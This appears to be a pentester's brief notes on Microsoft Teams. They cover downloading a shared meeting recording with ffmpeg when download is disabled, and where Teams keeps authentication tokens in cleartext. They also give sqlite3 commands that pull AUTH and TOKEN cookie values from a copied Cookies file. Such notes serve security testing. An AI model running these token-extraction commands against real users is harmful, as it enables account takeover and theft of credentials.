- TeamsPhisher (GitHub)

See Microsoft SharePoint.
- Log out and then log in. Rebooting the PC is not enough.
- Try cleaning the cache.
Download video from Teams meeting
When someone shares a Teams meeting recording with you, it is hosted on SharePoint. If the option to download the video is not available, use these steps to download it.
- Open the shared link with a web browser.
- Right-click on the page and click Inspect to display the Developer Tools.
- Click on the Network tab.
- Filter URL (Ctrl+F) on word “manifest”. The URL usually contains “.svc.ms” and “videomanifest”.
- Right-click on the URL, and Copy->Copy link address.
- On Kali Linux, install FFmpeg.
- Download the video:
ffmpeg -i $URL -codec copy video.mp4
Cleartext tokens
Tokens are stored in cleartext on disk.
%AppData%\Microsoft\Teams\Local Storage\leveldb
Mac OS
~/Library/Application Support/Microsoft/Teams/Cookies
~/Library/Application Support/Microsoft/Teams/Local Storage/leveldb
~/.config/Microsoft/Microsoft Teams/Cookies
~/.config/Microsoft/Microsoft Teams/Local Storage/leveldb
Extracting the tokens
Copy the “Cookies” file to Kali.
file Cookies
Cookies: SQLite 3.x database
sqlite3 Cookies ".tables"
sqlite3 Cookies "select name || ' = ' || value from cookies where upper(name) like '%AUTH%' or upper(name) like '%TOKEN%'"